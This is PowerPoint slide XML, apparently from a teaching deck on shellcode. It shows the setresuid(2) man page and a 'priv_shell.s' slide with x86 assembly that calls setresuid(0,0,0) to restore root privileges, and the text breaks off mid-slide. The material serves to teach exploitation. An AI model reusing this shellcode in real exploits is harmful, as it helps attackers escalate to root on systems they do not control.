              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> $ man 2 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>setresuid</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> SETRESUID(2)               Linux Programmer's Manual              SETRESUID(2)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>NAME</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>       </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>setresuid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>setresgid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> - set real, effective and saved user or group ID</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>SYNOPSIS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>       #define _GNU_SOURCE</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>       #include &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>unistd.h</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>       </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>setresuid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>uid_t</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ruid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>uid_t</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>euid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>uid_t</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>suid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>       </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>setresgid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>gid_t</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>rgid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>gid_t</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>egid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>gid_t</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>sgid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>DESCRIPTION</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>       </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>setresuid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>() sets the real user ID, the effective user ID, and the saved</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>       set-user-ID of the current process.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="266977031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err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>priv_shell.s</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="223838" indent="-223838" algn="l" defTabSz="895350">
              <a:spcBef>
                <a:spcPct val="30000"/>
              </a:spcBef>
            </a:pP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err="1" smtClean="0"/>
              <a:t>Shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> to regain privileges</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="467544" y="1551220"/>
            <a:ext cx="8352928" cy="4829527"/>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400" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>BITS 32</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>setresuid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>uid_t</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ruid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>uid_t</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>euid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>uid_t</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>suid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>xor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>      ; Zero out </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>xor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ebx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ebx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>      ; Zero out </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ebx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>xor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ecx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ecx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>      ; Zero out </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ecx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>xor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>edx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>edx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>      ; Zero out </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>edx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> al,  0xa4     ; 164 (0xa4) for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>syscall</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> #164</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> 0x80          ; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>setresuid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(0, 0, 0)  Restore all root </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>privs</a:t>
            </a:r>
            <a:r>
